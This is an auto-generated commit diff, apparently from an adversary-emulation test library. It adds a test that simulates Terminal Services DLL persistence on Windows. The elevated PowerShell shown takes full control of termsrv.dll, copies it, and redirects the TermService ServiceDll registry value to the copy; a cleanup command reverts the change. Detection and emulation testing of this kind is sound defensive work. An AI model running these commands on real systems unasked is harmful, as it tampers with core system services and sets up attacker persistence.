Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -895,6 +895,7 @@ persistence,T1137.006,Office Application Startup: Add-ins,5,Persistent Code Exec
 persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
+persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -626,6 +626,7 @@ persistence,T1137.006,Office Application Startup: Add-ins,5,Persistent Code Exec
 persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
+persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual

atomics/Indexes/Indexes-Markdown/index.md

@@ -1358,6 +1358,7 @@
   - Atomic Test #1: Install and Register Password Filter DLL [windows]
 - [T1505.005 Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md)
   - Atomic Test #1: Simulate Patching termsrv.dll [windows]
+  - Atomic Test #2: Modify Terminal Services DLL Path [windows]
 - [T1176 Browser Extensions](../../T1176/T1176.md)
   - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -966,6 +966,7 @@
   - Atomic Test #1: Install and Register Password Filter DLL [windows]
 - [T1505.005 Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md)
   - Atomic Test #1: Simulate Patching termsrv.dll [windows]
+  - Atomic Test #2: Modify Terminal Services DLL Path [windows]
 - [T1176 Browser Extensions](../../T1176/T1176.md)
   - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]

atomics/Indexes/index.yaml

@@ -58683,11 +58683,13 @@ persistence:
       executor:
         elevation_required: true
         command: |
-          $ACL = Get-Acl $fileName
+          $termsrvDll = "C:\Windows\System32\termsrv.dll"
+
+          $ACL = Get-Acl $termsrvDll
           $permission = "Administrators","FullControl","Allow"
           $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
           $ACL.SetAccessRule($accessRule)
-          Set-Acl -Path $fileName -AclObject $ACL
+          Set-Acl -Path $termsrvDll -AclObject $ACL
 
           Copy-Item -Path "C:\Windows\System32\termsrv.dll" -Destination "C:\Windows\System32\termsrv_backup.dll" -ErrorAction Ignore
           Add-Content -Path "C:\Windows\System32\termsrv.dll" -Value "`n" -NoNewline -ErrorAction Ignore
@@ -58697,6 +58699,42 @@ persistence:
 
           '
         name: powershell
+    - name: Modify Terminal Services DLL Path
+      auto_generated_guid: 18136e38-0530-49b2-b309-eed173787471
+      description: This atomic test simulates the modification of the ServiceDll value
+        in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique
+        may be leveraged by adversaries to establish persistence by loading a patched
+        version of the DLL containing malicious code.
+      supported_platforms:
+      - windows
+      executor:
+        elevation_required: true
+        command: |-
+          $termsrvDll = "C:\Windows\System32\termsrv.dll"
+
+          $ACL = Get-Acl $termsrvDll
+          $permission = "Administrators","FullControl","Allow"
+          $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
+          $ACL.SetAccessRule($accessRule)
+          Set-Acl -Path $termsrvDll -AclObject $ACL
+
+          Copy-Item -Path $termsrvDll -Destination "$HOME\AtomicTest.dll"
+
+          $newServiceDll = "$HOME\AtomicTest.dll"
+
+          $registryPath = "HKLM:\System\CurrentControlSet\services\TermService\Parameters"
+
+          # Check if the registry key exists
+          if (Test-Path -Path $registryPath) {
+              # Modify the ServiceDll value in the registry
+              Set-ItemProperty -Path $registryPath -Name "ServiceDll" -Value $newServiceDll
+              Write-Host "ServiceDll value in the registry has been updated to: $newServiceDll"
+          } else {
+              Write-Host "Registry key not found. Make sure the 'TermService\Parameters' key exists."
+          }
+        cleanup_command: Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\services\TermService\Parameters"
+          -Name "ServiceDll" -Value "C:\Windows\System32\termsrv.dll"
+        name: powershell
   T1176:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -50864,11 +50864,13 @@ persistence:
       executor:
         elevation_required: true
         command: |
-          $ACL = Get-Acl $fileName
+          $termsrvDll = "C:\Windows\System32\termsrv.dll"
+
+          $ACL = Get-Acl $termsrvDll
           $permission = "Administrators","FullControl","Allow"
           $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
           $ACL.SetAccessRule($accessRule)
-          Set-Acl -Path $fileName -AclObject $ACL
+          Set-Acl -Path $termsrvDll -AclObject $ACL
 
           Copy-Item -Path "C:\Windows\System32\termsrv.dll" -Destination "C:\Windows\System32\termsrv_backup.dll" -ErrorAction Ignore
           Add-Content -Path "C:\Windows\System32\termsrv.dll" -Value "`n" -NoNewline -ErrorAction Ignore
@@ -50878,6 +50880,42 @@ persistence:
 
           '
         name: powershell
+    - name: Modify Terminal Services DLL Path
+      auto_generated_guid: 18136e38-0530-49b2-b309-eed173787471
+      description: This atomic test simulates the modification of the ServiceDll value
+        in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique
+        may be leveraged by adversaries to establish persistence by loading a patched
+        version of the DLL containing malicious code.
+      supported_platforms:
+      - windows
+      executor:
+        elevation_required: true
+        command: |-
+          $termsrvDll = "C:\Windows\System32\termsrv.dll"
+
+          $ACL = Get-Acl $termsrvDll
+          $permission = "Administrators","FullControl","Allow"
+          $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
+          $ACL.SetAccessRule($accessRule)
+          Set-Acl -Path $termsrvDll -AclObject $ACL
+
+          Copy-Item -Path $termsrvDll -Destination "$HOME\AtomicTest.dll"
+
+          $newServiceDll = "$HOME\AtomicTest.dll"
+
+          $registryPath = "HKLM:\System\CurrentControlSet\services\TermService\Parameters"
+
+          # Check if the registry key exists
+          if (Test-Path -Path $registryPath) {
+              # Modify the ServiceDll value in the registry
+              Set-ItemProperty -Path $registryPath -Name "ServiceDll" -Value $newServiceDll
+              Write-Host "ServiceDll value in the registry has been updated to: $newServiceDll"
+          } else {
+              Write-Host "Registry key not found. Make sure the 'TermService\Parameters' key exists."
+          }
+        cleanup_command: Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\services\TermService\Parameters"
+          -Name "ServiceDll" -Value "C:\Windows\System32\termsrv.dll"
+        name: powershell
   T1176:
     technique:
       x_mitre_platforms:

atomics/T1505.005/T1505.005.md

@@ -10,6 +10,8 @@ Adversaries may modify and/or replace the Terminal Services DLL to enable persis
 
 - [Atomic Test #1 - Simulate Patching termsrv.dll](#atomic-test-1---simulate-patching-termsrvdll)
 
+- [Atomic Test #2 - Modify Terminal Services DLL Path](#atomic-test-2---modify-terminal-services-dll-path)
+
 
 <br/>
 
@@ -31,11 +33,13 @@ Before we can make the modifications we need to take ownership of the file and g
 
 
 ```powershell
-$ACL = Get-Acl $fileName
+$termsrvDll = "C:\Windows\System32\termsrv.dll"
+
+$ACL = Get-Acl $termsrvDll
 $permission = "Administrators","FullControl","Allow"
 $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
 $ACL.SetAccessRule($accessRule)
-Set-Acl -Path $fileName -AclObject $ACL
+Set-Acl -Path $termsrvDll -AclObject $ACL
 
 Copy-Item -Path "C:\Windows\System32\termsrv.dll" -Destination "C:\Windows\System32\termsrv_backup.dll" -ErrorAction Ignore
 Add-Content -Path "C:\Windows\System32\termsrv.dll" -Value "`n" -NoNewline -ErrorAction Ignore
@@ -51,4 +55,57 @@ Move-Item -Path "C:\Windows\System32\termsrv_backup.dll" -Destination "C:\Window
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Modify Terminal Services DLL Path
+This atomic test simulates the modification of the ServiceDll value in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique may be leveraged by adversaries to establish persistence by loading a patched version of the DLL containing malicious code.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 18136e38-0530-49b2-b309-eed173787471
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$termsrvDll = "C:\Windows\System32\termsrv.dll"
+
+$ACL = Get-Acl $termsrvDll
+$permission = "Administrators","FullControl","Allow"
+$accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
+$ACL.SetAccessRule($accessRule)
+Set-Acl -Path $termsrvDll -AclObject $ACL
+
+Copy-Item -Path $termsrvDll -Destination "$HOME\AtomicTest.dll"
+
+$newServiceDll = "$HOME\AtomicTest.dll"
+
+$registryPath = "HKLM:\System\CurrentControlSet\services\TermService\Parameters"
+
+# Check if the registry key exists
+if (Test-Path -Path $registryPath) {
+    # Modify the ServiceDll value in the registry
+    Set-ItemProperty -Path $registryPath -Name "ServiceDll" -Value $newServiceDll
+    Write-Host "ServiceDll value in the registry has been updated to: $newServiceDll"
+} else {
+    Write-Host "Registry key not found. Make sure the 'TermService\Parameters' key exists."
+}
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\services\TermService\Parameters" -Name "ServiceDll" -Value "C:\Windows\System32\termsrv.dll"
+```
+
+
+
+
+
 <br/>